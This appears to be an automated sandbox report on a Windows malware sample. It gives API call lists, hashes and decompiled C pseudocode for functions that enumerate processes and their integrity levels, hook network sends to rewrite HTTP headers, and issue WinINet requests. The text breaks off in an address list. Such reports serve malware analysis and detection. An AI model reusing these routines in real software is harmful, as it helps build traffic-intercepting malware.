0x004071c7
0x004071cd
0x004071d2
0x004071dd
0x004071f9
0x00407201
0x0040720f
0x00407217
0x0040722d
0x00407235
0x00407245
0x00407248
0x0040724d
0x00407254
0x00407254
0x00407237
0x00407238
0x00407243
0x00000000
0x00000000
0x00407243
0x00407263
0x00407269
0x0040726b
0x00407282
0x0040728a
0x00000000
0x00000000
0x00000000
0x0040728a
0x00407290
0x00407294
0x0040729b
0x004072a0
0x004072a7
0x004072a7
0x004072b8
0x004072ba
0x004072c1
0x004072c6
0x004072cd
0x004072cd
0x004072d8
0x004072e3
0x004072ea
0x004072f5

APIs

accept.WS2_32(?,00000000,00000000), ref: 004071C7
WSAEventSelect.WS2_32(00000000,00000000,00000000), ref: 004071DD
WSAIoctl.WS2_32(?,?,?,?,?,?,?,?,00000000), ref: 00407201
setsockopt.WS2_32(00000000,00000006,00000001,00000000,00000004), ref: 00407217
CreateThread.KERNEL32 ref: 0040722D
CloseHandle.KERNEL32(00000000), ref: 00407238
shutdown.WS2_32(00000000,00000002), ref: 0040724D
closesocket.WS2_32(00000000), ref: 00407254
accept.WS2_32(00000000,00000000,00000000), ref: 00407263
WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 00407282
shutdown.WS2_32(?,00000002), ref: 004072A0
closesocket.WS2_32(?), ref: 004072A7
CloseHandle.KERNEL32(?), ref: 004072B8
shutdown.WS2_32(?,00000002), ref: 004072C6
closesocket.WS2_32(?), ref: 004072CD
CloseHandle.KERNEL32(?), ref: 004072D8
ReleaseMutex.KERNEL32(00000000), ref: 004072E3
CloseHandle.KERNEL32(00000000), ref: 004072EA

Strings

p0u, xrefs: 00407254, 004072A7, 004072CD

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$closesocketshutdown$accept$CreateEventIoctlMultipleMutexObjectsReleaseSelectThreadWaitsetsockopt
String ID: p0u
API String ID: 1352971239-1742372003
Opcode ID: bdf2da715f5981b914212602e899309bbb50f3bc5310c22d2aed178986e4bec4
Instruction ID: 7b2ab4f4582c56943254c15caf3ac3269141f8068eb0b80c40cd2e3ada20e259
Opcode Fuzzy Hash: bdf2da715f5981b914212602e899309bbb50f3bc5310c22d2aed178986e4bec4
Instruction Fuzzy Hash: FA419931649310BBD310AB64DD49F5F77A8AB85720F100A69F652B72E0D774AC058B9F

Uniqueness

Uniqueness Score: -1.00%

Function 00428230, Relevance: 31.7, APIs: 21, Instructions: 241
memoryprocessCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00428230(void* __edx) {
				long _v564;
				char _v568;
				void* _v572;
				intOrPtr _v580;
				long _v584;
				void _v588;
				void* _v592;
				long _v596;
				long _v600;
				void* _v604;
				char _v605;
				void* _v608;
				intOrPtr _v609;
				long _v612;
				char _v613;
				void* _v616;
				struct tagPROCESSENTRY32W* _t59;
				signed int _t62;
				void _t63;
				void* _t73;
				void* _t74;
				signed char _t81;
				void* _t84;
				long _t88;
				int _t95;
				void* _t98;
				void* _t100;
				long _t102;
				void* _t104;
				long _t116;
				signed char _t120;
				void* _t125;
				intOrPtr _t127;
				void* _t128;
				signed int _t131;
				void _t133;
				void* _t135;
				void* _t136;
				void* _t139;
				long _t140;

				_t125 = 0;
				_t131 = 0;
				_v605 = 0;
				_v604 = 0;
				_v600 = 0;
				while(1) {
					_t98 = CreateToolhelp32Snapshot(2, 0);
					_v588 = _t98;
					_v600 = 0;
					if(_t98 == 0xffffffff) {
						break;
					}
					_t59 =  &_v568;
					_v568 = 0x22c;
					Process32FirstW(_t98, _t59);
					if(_t59 == 0) {
						L47:
						CloseHandle(_t98);
						if(_v604 != 0) {
							continue;
						}
						break;
					}
					_v588 = 8 + _t131 * 4;
					do {
						_t102 = _v564;
						if(_t102 != 0 && _t102 !=  *0x42eb68) {
							_t62 = 0;
							if(_t131 == 0) {
								L9:
								_t63 = E0041CCB0(_t151, _t102);
								_v588 = _t63;
								if(_t63 == 0) {
									goto L46;
								}
								_t139 = OpenProcess(0x400, 0, _v564);
								if(_t139 == 0) {
									L45:
									CloseHandle(_v584);
									goto L46;
								}
								_t100 = 0;
								if(OpenProcessToken(_t139, 8,  &_v600) == 0) {
									L22:
									CloseHandle(_t139);
									if(_t100 == 0) {
										L44:
										_t98 = _v592;
										goto L45;
									}
									if(_v580 !=  *0x42e908) {
										L43:
										HeapFree( *0x42e6d4, 0, _t100);
										_t131 = _v608;
										_t125 = _v612;
										goto L44;
									}
									_t140 = GetLengthSid( *_t100);
									if(_t140 !=  *0x42e900) {
										goto L43;
									}
									_t104 = 0;
									if(_t140 == 0) {
										L32:
										_t133 = _v588;
										_t73 = _v612;
										_t116 = _t133 - 4;
										if(_t116 != 0) {
											_push(_t133);
											__eflags = _t73;
											if(_t73 != 0) {
												_t74 = HeapReAlloc( *0x42e6d4, 8, _t73, ??);
											} else {
												_t74 = HeapAlloc( *0x42e6d4, 8, ??);
											}
											__eflags = _t74;
											if(__eflags != 0) {
												_v612 = _t74;
												L41:
												 *((intOrPtr*)(_t133 + _v612 - 8)) = _v564;
												_v608 = _v608 + 1;
												_v604 = _v604 + 1;
												_v588 = _t133 + 4;
												if(E00428190(_v564, _v584) != 0) {
													_v613 = 1;
												}
											}
											goto L43;
										}
										if(_t73 != 0) {
											HeapFree( *0x42e6d4, _t116, _t73);
										}
										_v612 = 0;
										goto L41;
									}
									_t135 =  *_t100;
									_t127 =  *((intOrPtr*)( *0x42e8fc));
									while(1) {
										_t120 =  *((intOrPtr*)(_t135 + _t104));
										_t81 =  *((intOrPtr*)(_t127 + _t104));
										if(_t120 != _t81) {
											break;
										}
										_t104 = _t104 + 1;
										if(_t104 < _t140) {
											continue;
										}
										goto L32;
									}
									__eflags = (_t120 & 0x000000ff) - (_t81 & 0x000000ff);
									if(__eflags != 0) {
										goto L43;
									}
									goto L32;
								}
								_t84 = _v600;
								_t128 = _t84;
								if(GetTokenInformation(_t84, 1, 0, 0,  &_v596) != 0 || GetLastError() != 0x7a) {
									L20:
									_t100 = 0;
									goto L21;
								} else {
									_t88 = _v600;
									if(_t88 == 0) {
										goto L20;
									}
									_t136 = HeapAlloc( *0x42e6d4, 8, _t88 + 4);
									if(_t136 == 0) {
										goto L20;
									}
									if(GetTokenInformation(_t128, 1, _t136, _v600,  &_v600) == 0) {
										_push(_t136);
										_push(0);
										_push( *0x42e6d4);
										L19:
										HeapFree();
										goto L20;
									}
									_t100 = _t136;
									_t95 = GetTokenInformation(_v608, 0xc,  &_v588, 4,  &_v584);
									if(_t95 != 0) {
										L21:
										CloseHandle(_v604);
										_t131 = _v612;
										_t125 = _v616;
										goto L22;
									}
									_push(_t136);
									_push(_t95);
									_push( *0x42e6d4);
									goto L19;
								}
							}
							while( *((intOrPtr*)(_t125 + _t62 * 4)) != _t102) {
								_t62 = _t62 + 1;
								_t151 = _t62 - _t131;
								if(_t62 < _t131) {
									continue;
								}
								goto L9;
							}
						}
						L46:
					} while (Process32NextW(_t98,  &_v572) != 0);
					goto L47;
				}
				if(_t125 != 0) {
					HeapFree( *0x42e6d4, 0, _t125);
				}
				return _v609;
			}

0x00428240
0x00428242
0x00428244
0x00428249
0x0042824d
0x00428251
0x0042825b
0x0042825d
0x00428261
0x0042826c
0x00000000
0x00000000
0x00428272
0x00428278
0x00428280
0x00428288
0x004284e8
0x004284e9
0x004284f4
0x00000000
0x00000000
0x00000000
0x004284f4
0x00428295
0x00428299
0x00428299
0x0042829f
0x004282b1
0x004282b5
0x004282c5
0x004282c6
0x004282cb
0x004282d1
0x00000000
0x00000000
0x004282e9
0x004282ed
0x004284c9
0x004284ce
0x00000000
0x004284ce
0x004282fb
0x00428305
0x004283ad
0x004283ae
0x004283b6
0x004284c5
0x004284c5
0x00000000
0x004284c5
0x004283c6
0x004284ae
0x004284b7
0x004284bd
0x004284c1
0x00000000
0x004284c1
0x004283d5
0x004283dd
0x00000000
0x00000000
0x004283e3
0x004283e7
0x0042841e
0x0042841e
0x00428422
0x00428426
0x0042842b
0x00428449
0x0042844a
0x0042844c
0x00428469
0x0042844e
0x00428457
0x00428457
0x0042846f
0x00428471
0x00428473
0x00428477
0x00428483
0x0042848c
0x00428490
0x0042849c
0x004284a7
0x004284a9
0x004284a9
0x004284a7
0x00000000
0x00428471
0x0042842f
0x00428439
0x00428439
0x0042843f
0x00000000
0x0042843f
0x004283ef
0x004283f1
0x004283f3
0x004283f3
0x004283f6
0x004283fb
0x00000000
0x00000000
0x004283fd
0x00428400
0x00000000
0x00000000
0x00000000
0x00428402
0x00428416
0x00428418
0x00000000
0x00000000
0x00000000
0x00428418
0x0042830b
0x00428319
0x00428323
0x00428398
0x00428398
0x00000000
0x00428330
0x00428330
0x00428336
0x00000000
0x00000000
0x0042834b
0x0042834f
0x00000000
0x00000000
0x00428369
0x0042840a
0x0042840b
0x0042840d
0x00428392
0x00428392
0x00000000
0x00428392
0x00428382
0x00428384
0x00428388
0x0042839a
0x0042839f
0x004283a5
0x004283a9
0x00000000
0x004283a9
0x0042838a
0x0042838b
0x00428391
0x00000000
0x00428391
0x00428323
0x004282b7
0x004282c0
0x004282c1
0x004282c3
0x00000000
0x00000000
0x00000000
0x004282c3
0x004282b7
0x004284d4
0x004284e0
0x00000000
0x00428299
0x004284fc
0x00428507
0x00428507
0x00428518

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00428255
Process32FirstW.KERNEL32 ref: 00428280
OpenProcess.KERNEL32(00000400,00000000,0000022C,0000022C,?,?,?,?,?,?,?,?,00000000,?), ref: 004282E3
OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004282FD
GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042831B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?), ref: 00428325
HeapAlloc.KERNEL32(?,00000008,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00428345
GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00428365
GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00428384
HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00428392
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042839F
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 004283AE
GetLengthSid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 004283CF
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00428439
HeapAlloc.KERNEL32(?,00000008,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00428457
HeapReAlloc.KERNEL32(?,00000008,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00428469
HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 004284B7
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?), ref: 004284CE
Process32NextW.KERNEL32(00000000,?), ref: 004284DA
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 004284E9
HeapFree.KERNEL32(?,00000000,00000000), ref: 00428507

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$CloseFreeHandleToken$AllocInformation$OpenProcessProcess32$CreateErrorFirstLastLengthNextSnapshotToolhelp32
String ID:
API String ID: 1383361078-0
Opcode ID: 6b1d318aa0451d2058ee99436b2bec713ca147e4bedfb882446048c1b6941006
Instruction ID: d53cd6147a2233de1c9c15b0ea736f2481f6e24e0a0d45c6e7292151b4372724
Opcode Fuzzy Hash: 6b1d318aa0451d2058ee99436b2bec713ca147e4bedfb882446048c1b6941006
Instruction Fuzzy Hash: 1D818F703053129FD724DF65ED84B2F77A8BB98744F80092DFA85E7260EB74E8058B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00408900, Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 318
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00408900(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v40;
				void* _v44;
				intOrPtr _v56;
				void* _v60;
				char _v76;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				void* _v100;
				signed char _v104;
				signed char _v108;
				void* _v112;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				void* _v148;
				void* __esi;
				long _t99;
				long _t103;
				signed int _t106;
				intOrPtr _t107;
				void* _t108;
				signed int _t117;
				intOrPtr _t123;
				signed char _t127;
				void* _t150;
				void* _t152;
				intOrPtr _t166;
				signed int _t168;
				signed char _t177;
				signed int _t181;
				intOrPtr _t185;
				intOrPtr _t194;
				intOrPtr _t198;
				void* _t199;
				void* _t207;
				void* _t209;
				signed int _t213;
				signed int _t222;
				intOrPtr _t234;
				signed int _t238;
				void* _t240;

				_t240 = (_t238 & 0xfffffff8) - 0x5c;
				_t99 = WaitForSingleObject( *0x42edbc, 0);
				_t166 = _a12;
				if(_t99 == 0 || _a8 == 0 || _t166 <= 0) {
					L9:
					return  *0x42d3b4(_a4, _a8, _t166);
				} else {
					EnterCriticalSection(0x42d3c4);
					_t222 = E00407350(_a4);
					if(_t222 == 0xffffffff) {
						L8:
						LeaveCriticalSection(0x42d3c4);
						goto L9;
					} else {
						_t194 =  *0x42d3e0; // 0x0
						_t181 = _t222 * 8 - _t222;
						_t207 = _t194 + _t181 * 8;
						if( *((intOrPtr*)(_t194 + 0x20 + _t181 * 8)) > 0) {
							L30:
							_t103 =  *(_t207 + 0x24);
							_t209 =  *((intOrPtr*)(_t207 + 0x20)) - _t103;
							LeaveCriticalSection(0x42d3c4);
							_t168 =  *0x42d3b4(_a4,  *((intOrPtr*)(_t207 + 0x1c)) + _t103, _t209);
							if(_t168 == 0xffffffff) {
								L36:
								return _t168;
							} else {
								EnterCriticalSection(0x42d3c4);
								_t106 = E00407350(_a4);
								if(_t106 != 0xffffffff) {
									_t107 =  *0x42d3e0; // 0x0
									_t108 = _t107 + (_t106 * 8 - _t106) * 8;
									if(_t168 != _t209) {
										 *((intOrPtr*)(_t108 + 0x24)) =  *((intOrPtr*)(_t108 + 0x24)) + _t168;
										 *((intOrPtr*)(_t108 + 0x28)) =  *((intOrPtr*)(_t108 + 0x28)) - 1;
										_t168 = 1;
										LeaveCriticalSection(0x42d3c4);
										goto L36;
									} else {
										_t82 = _t108 + 0x1c; // 0x1c
										E00410870(E004107C0( *_t82), _t82, 0, 0x10);
										LeaveCriticalSection(0x42d3c4);
										return  *((intOrPtr*)(_t108 + 0x28));
									}
								} else {
									 *0x42d3c0(0xffffe890, 8);
									LeaveCriticalSection(0x42d3c4);
									return _t168 | _t106;
								}
							}
						} else {
							if( *((intOrPtr*)(_t207 + 8)) > 0) {
								L39:
								LeaveCriticalSection(0x42d3c4);
								_t230 = _a4;
								_t213 =  *0x42d3b4(_a4, _a8, _t166);
								if(_t213 == 0xffffffff) {
									L45:
									return _t213;
								} else {
									EnterCriticalSection(0x42d3c4);
									_t117 = E00407350(_t230);
									if(_t117 != 0xffffffff) {
										_t198 =  *0x42d3e0; // 0x0
										_t199 = _t198 + (_t117 * 8 - _t117) * 8;
										_t185 =  *((intOrPtr*)(_t199 + 8));
										if(_t213 > _t185) {
											E00407480(_t117);
											LeaveCriticalSection(0x42d3c4);
											goto L45;
										} else {
											 *((intOrPtr*)(_t199 + 8)) = _t185 - _t213;
											LeaveCriticalSection(0x42d3c4);
											return _t213;
										}
									} else {
										 *0x42d3c0(0xffffe890, 8);
										LeaveCriticalSection(0x42d3c4);
										return _t213 | _t117;
									}
								}
							} else {
								_push(_t166);
								_push(_a8);
								_push(_a4);
								_push( &_v76);
								_t123 = E004079C0();
								_v96 = _t123;
								if(_t123 != 0xffffffff) {
									if(_v88 == 0) {
										L38:
										E00425BD0( &_v92);
										 *((intOrPtr*)(_t207 + 8)) = _v96 + _t166;
										goto L39;
									} else {
										_push( &_v92);
										_t127 = E00424ED0();
										_v104 = _t127;
										if((_t127 & 0x00000001) == 0) {
											_t177 = 0;
											_v104 = 0;
											_v108 = 0;
											if((_t127 & 0x00000002) != 0) {
												_t177 = E00410840(_a12, _a8);
												_v108 = _t177;
												if(_t177 != 0) {
													E00425CF0( *((intOrPtr*)(_t207 + 0x10)),  *((intOrPtr*)(_t207 + 0xc)));
													E004107C0( *((intOrPtr*)(_t207 + 0x14)));
													E004107C0( *((intOrPtr*)(_t207 + 4)));
													 *((intOrPtr*)(_t207 + 4)) = E00410E10( *((intOrPtr*)(_t240 + 0x2c)), _v88);
													 *((intOrPtr*)(_t207 + 0x14)) = 0;
													 *((intOrPtr*)(_t207 + 0x18)) = 0;
													 *((intOrPtr*)(_t207 + 0xc)) = _v40;
													 *((intOrPtr*)(_t207 + 0x10)) = _v36;
													_t150 = E00417BB0(_t177, _a12, "Accept-Encoding", "identity");
													_push("TE");
													_push(_t150);
													_t152 = E00417B00(_t177);
													_push("If-Modified-Since");
													_push(_t152);
													 *((intOrPtr*)(_t240 + 0x10)) = E00417B00(_t177);
												} else {
													E00425CF0( *((intOrPtr*)(_t240 + 0x5c)), _v36);
												}
												_t127 =  *(_t240 + 0x18);
											}
											if((_t127 & 0x00000004) == 0) {
												L28:
												if(_t177 == 0) {
													goto L37;
												} else {
													E00425BD0( &_v92);
													 *((intOrPtr*)(_t207 + 8)) = _v96;
													 *((intOrPtr*)(_t207 + 0x1c)) = _t177;
													 *((intOrPtr*)(_t207 + 0x20)) = _v108;
													 *(_t207 + 0x24) = 0;
													 *((intOrPtr*)(_t207 + 0x28)) = _a12;
													goto L30;
												}
											} else {
												if(_t177 != 0) {
													_t234 = _v108;
												} else {
													_t177 = _a8;
													_t234 = _a12;
												}
												_push( &_v104);
												_push( *((intOrPtr*)(_t240 + 0x48)));
												_push(_v56);
												_push(_t177);
												_v124 = E00407EF0(_t234);
												E004107C0( *((intOrPtr*)(_t240 + 0x44)));
												if(_v124 != 0) {
													if(_t177 != _a8) {
														E004107C0(_t177);
													}
													_t177 = _v120;
													goto L28;
												} else {
													if(_t177 == _a8) {
														L37:
														_t166 = _a12;
														goto L38;
													} else {
														_v124 = _t234;
														goto L28;
													}
												}
											}
										} else {
											E00425BD0( &_v92);
											LeaveCriticalSection(0x42d3c4);
											return  *0x42d3c0(0xffffe8a3, 0) | 0xffffffff;
										}
									}
								} else {
									E00407480(_t222);
									E00425BD0( &_v92);
									goto L8;
								}
							}
						}
					}
				}
			}

0x0040890b
0x00408914
0x0040891a
0x0040891f
0x004089a7
0x004089bf
0x0040892f
0x00408934
0x00408942
0x00408947
0x0040899c
0x004089a1
0x00000000
0x00408949
0x00408949
0x00408956
0x0040895d
0x00408960
0x00408b48
0x00408b48
0x00408b58
0x00408b5a
0x00408b6c
0x00408b74
0x00408c0e
0x00408c16
0x00408b7a
0x00408b7f
0x00408b88
0x00408b90
0x00408bc1
0x00408bc6
0x00408bcb
0x00408bf8
0x00408bfb
0x00408c03
0x00408c08
0x00000000
0x00408bcd
0x00408bd0
0x00408bdf
0x00408be9
0x00408bf7
0x00408bf7
0x00408b92
0x00408b9b
0x00408ba9
0x00408bb7
0x00408bb7
0x00408b90
0x00408966
0x0040896a
0x00408c2c
0x00408c31
0x00408c3a
0x00408c46
0x00408c4e
0x00408ccd
0x00408cd5
0x00408c50
0x00408c55
0x00408c5b
0x00408c63
0x00408c8b
0x00408c9a
0x00408c9d
0x00408ca2
0x00408cbd
0x00408cc7
0x00000000
0x00408ca4
0x00408cab
0x00408cae
0x00408cbc
0x00408cbc
0x00408c65
0x00408c6e
0x00408c7c
0x00408c8a
0x00408c8a
0x00408c63
0x00408970
0x00408976
0x00408977
0x00408978
0x0040897d
0x0040897e
0x00408983
0x0040898a
0x004089c5
0x00408c1a
0x00408c1e
0x00408c29
0x00000000
0x004089cb
0x004089cf
0x004089d0
0x004089d5
0x004089db
0x00408a0b
0x00408a0d
0x00408a11
0x00408a17
0x00408a29
0x00408a2b
0x00408a31
0x00408a4a
0x00408a52
0x00408a5a
0x00408a74
0x00408a7e
0x00408a81
0x00408a8e
0x00408a91
0x00408a94
0x00408a99
0x00408a9e
0x00408aa1
0x00408aa6
0x00408aab
0x00408ab3
0x00408a33
0x00408a3c
0x00408a3c
0x00408ab7
0x00408ab7
0x00408abd
0x00408b19
0x00408b1b
0x00000000
0x00408b21
0x00408b25
0x00408b35
0x00408b38
0x00408b3b
0x00408b3e
0x00408b45
0x00000000
0x00408b45
0x00408abf
0x00408ac1
0x00408acb
0x00408ac3
0x00408ac3
0x00408ac6
0x00408ac6
0x00408adb
0x00408adc
0x00408add
0x00408ade
0x00408ae6
0x00408aee
0x00408af8
0x00408b0c
0x00408b10
0x00408b10
0x00408b15
0x00000000
0x00408afa
0x00408afd
0x00408c17
0x00408c17
0x00000000
0x00408b03
0x00408b03
0x00000000
0x00408b03
0x00408afd
0x00408af8
0x004089dd
0x004089e1
0x004089eb
0x00408a0a
0x00408a0a
0x004089db
0x0040898c
0x0040898e
0x00408997
0x00000000
0x00408997
0x0040898a
0x0040896a
0x00408960
0x00408947

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 00408914
EnterCriticalSection.KERNEL32(0042D3C4), ref: 00408934
LeaveCriticalSection.KERNEL32(0042D3C4), ref: 004089A1
LeaveCriticalSection.KERNEL32(0042D3C4,?), ref: 004089EB
LeaveCriticalSection.KERNEL32(0042D3C4), ref: 00408B5A
EnterCriticalSection.KERNEL32(0042D3C4), ref: 00408B7F
LeaveCriticalSection.KERNEL32(0042D3C4), ref: 00408BA9
LeaveCriticalSection.KERNEL32(0042D3C4,0000001C,00000000,00000010), ref: 00408BE9
LeaveCriticalSection.KERNEL32(0042D3C4), ref: 00408C08
LeaveCriticalSection.KERNEL32(0042D3C4), ref: 00408C31
EnterCriticalSection.KERNEL32(0042D3C4), ref: 00408C55
LeaveCriticalSection.KERNEL32(0042D3C4), ref: 00408C7C
LeaveCriticalSection.KERNEL32(0042D3C4), ref: 00408CAE

Part of subcall function 00407480: HeapFree.KERNEL32(?,00000000,?,00000000,00000000,?,00408CC2), ref: 004074B2
Part of subcall function 00407480: HeapFree.KERNEL32(?,00000000,?,?,00000000,00000000,?,00408CC2), ref: 004074D1
Part of subcall function 00407480: HeapFree.KERNEL32(?,00000000,?,?,00000000,00000000,?,00408CC2), ref: 004074E3
Part of subcall function 00407480: HeapFree.KERNEL32(?,00000000,?,?,00000000,00000000,?,00408CC2), ref: 004074F6
Part of subcall function 00407480: HeapFree.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,00408CC2), ref: 00407537

Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425BEA
Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425BFD
Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C10
Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C22
Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C35
Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C48
Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C5A
Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C6D

LeaveCriticalSection.KERNEL32(0042D3C4), ref: 00408CC7

Strings

If-Modified-Since, xrefs: 00408AA6
Accept-Encoding, xrefs: 00408A87
identity, xrefs: 00408A79

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalFreeHeapSection$Leave$Enter$ObjectSingleWait
String ID: Accept-Encoding$If-Modified-Since$identity
API String ID: 3946292479-3034467039
Opcode ID: c1540eb87958708ef49b76d53a9854f270b9bac68f2a3b10e1edae5f33efc1d7
Instruction ID: 0076ac7cbacc61c6bf87f49f3880dc39d7510c5281afac7c8dfc8ac8d80b0722
Opcode Fuzzy Hash: c1540eb87958708ef49b76d53a9854f270b9bac68f2a3b10e1edae5f33efc1d7
Instruction Fuzzy Hash: 13B1C0717043059FC710EF69E985A5AB7A0FF84324F10463EFC58A72A0DB78E855CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00425D90, Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 211
networkmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00425D90(intOrPtr* _a4) {
				intOrPtr* _v80;
				intOrPtr _v120;
				char _v528;
				short _v536;
				void* _v544;
				char* _v548;
				void* _v552;
				void* _v564;
				char _v566;
				char _v568;
				char _v572;
				char* _v576;
				char _v592;
				char _v600;
				void* _v620;
				char* _v624;
				char _v632;
				long _v640;
				void _v644;
				char _v652;
				char _v660;
				intOrPtr _v664;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t54;
				void* _t55;
				intOrPtr _t61;
				intOrPtr _t69;
				void* _t73;
				void* _t94;
				void* _t98;
				char* _t101;
				void* _t120;
				signed int _t123;
				void* _t125;
				void* _t128;
				intOrPtr* _t130;
				void** _t132;

				_t132 =  &_v544;
				_t130 = _a4;
				if(E004173A0( &_v528, _a4) == 0) {
					L30:
					__eflags = 0;
					return 0;
				} else {
					_t120 = InternetOpenA( *0x42eb6c, 0, 0, 0, 0);
					_v552 = _t120;
					if(_t120 == 0) {
						L26:
						_t54 = _v548;
						__eflags = _t54;
						if(_t54 != 0) {
							HeapFree( *0x42e6d4, 0, _t54);
						}
						_t55 = _v544;
						__eflags = _t55;
						if(_t55 != 0) {
							HeapFree( *0x42e6d4, 0, _t55);
						}
						goto L30;
					} else {
						_t125 = InternetConnectA(_t120, _v548, _v536, 0, 0, 3, 0, 0);
						_v564 = _t125;
						if(_t125 == 0) {
							L25:
							InternetCloseHandle(_t120);
							goto L26;
						} else {
							_t61 =  *_t130;
							_t101 = "POST";
							if( *((char*)(_t61 + 0x18)) != 1) {
								_t101 = "GET";
							}
							_t98 = HttpOpenRequestA(_t125, _t101, _v576, "HTTP/1.1",  *(_t61 + 8), 0, (0 | _v566 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
							if(_t98 == 0) {
								L24:
								InternetCloseHandle(_t125);
								goto L25;
							} else {
								E0041D1B0( &_v572);
								E004240C0(0xe,  &_v592);
								_t69 =  *_t130;
								_t140 =  *((intOrPtr*)(_t69 + 0x20));
								if( *((intOrPtr*)(_t69 + 0x20)) > 0) {
									_t94 = E00411E70(_t140,  &_v624,  &_v592,  *((intOrPtr*)(_t69 + 0x1c)));
									_t132 =  &(_t132[3]);
									if(_t94 > 0) {
										HttpAddRequestHeadersA(_t98, _v624, 0xffffffff, 0xa0000000);
										E004107C0(_v624);
									}
								}
								E004240C0(0xf,  &_v592);
								_t123 = 0;
								if(_v568 != 0) {
									do {
										_t123 = _t123 + 1;
									} while ( *((short*)(_t132 + 0x4c + _t123 * 2)) != 0);
								}
								_t73 = _t123 + _t123 * 2 + _t123 + _t123 * 2 + 2;
								if(_t73 != 0) {
									_t128 = HeapAlloc( *0x42e6d4, 8, _t73 + 4);
									_t145 = _t128;
									if(_t128 != 0) {
										E00417890(_t128,  &_v568, _t123);
										if(E00411E70(_t145,  &_v632,  &_v600, _t128) > 0) {
											HttpAddRequestHeadersA(_t98, _v624, 0xffffffff, 0xa0000000);
											E004107C0(_v624);
										}
										HeapFree( *0x42e6d4, 0, _t128);
									}
								}
								if(HttpSendRequestA(_t98, 0, 0,  *( *_v80 + 0x24),  *( *_v80 + 0x28)) != 1) {
									L23:
									InternetCloseHandle(_t98);
									_t125 = _v620;
									_t120 = _v640;
									goto L24;
								} else {
									_v640 = 4;
									_v644 = 0;
									if(HttpQueryInfoA(_t98, 0x20000013,  &_v644,  &_v640, 0) != 1 || _v664 != 0xc8) {
										goto L23;
									} else {
										if(E004136E0(_t98,  &_v660) != 0) {
											E004107C0(_t79);
										}
										E00417530( &_v652);
										 *(_v120 + 8) = _t98;
										return 0;
									}
								}
							}
						}
					}
				}
			}

0x00425d90
0x00425d98
0x00425daf
0x0042600f
0x0042600f
0x00426018
0x00425db5
0x00425dc9
0x00425dcb
0x00425dd1
0x00425fdd
0x00425fdd
0x00425fe1
0x00425fe3
0x00425fee
0x00425fee
0x00425ff4
0x00425ff8
0x00425ffa
0x00426006
0x00426006
0x00000000
0x00425dd7
0x00425df2
0x00425df4
0x00425dfa
0x00425fd6
